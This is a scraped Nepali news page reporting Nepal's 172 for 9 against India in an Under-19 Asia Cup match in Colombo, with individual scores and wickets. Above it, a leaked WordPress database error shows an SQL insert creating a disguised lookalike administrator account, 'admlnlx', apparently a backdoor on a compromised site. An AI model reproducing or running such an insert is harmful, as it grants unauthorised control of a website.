WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.TN472NFbIx9Gv5yvqWM9ibVRna3x1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 17:35:18', '', 'admlnlx', 'admlnlx')
श्रीलंका,पुस १-
श्रीलंकामा जारी यु १९ एसिया कपमा नेपालले बलियो प्रतिद्वन्द्धी भारतलाई अहिलेसम्मकै सबैभन्दा ठूलो रनको लक्ष्य दिएको छ।
कोलम्बोमा टस जितेर पहिले ब्याटिङ गरेको नेपालले निर्धारित ५० ओभरको खेलमा ९ विकेट गुमाएर १७२ रन बनायो।
नेपाल र भारतबीच खेलेको ४ भिडन्तमा सर्वाधिक ठूलो स्कोर बनाउने क्रममा नेपालका लागि रोहित कुमार पौडेलले अभिजित ६८ रन बनाए। यसअघि नेपालले ढाकामा भएको युवा विश्वकपमा भारतलाई १६९ रनको लक्ष्य दिएको थियो।
यस्तै श्रीलंकाविरूद्ध ९० रन बनाएका दीपेन्द्र सिंह ऐरीले ३४ रन बनाए। आशिफ शेखले १८, प्रकाश केसी १३ रन बनाउनुबाहेक अन्य खेलाडीले दोहोरो रनको स्कोर पुर्याएनन्।
नेपालका २ खेलाडी शून्यमा आउट भए। भारतका लागि राहुल चहारले सर्वाधिक ५ विकेट लिए। यस्तै कमलेश नगरकोटी, यस ठाकुर, आयुश जम्बवाल र हिमांशु रानाले एक-एक विकेट लिए।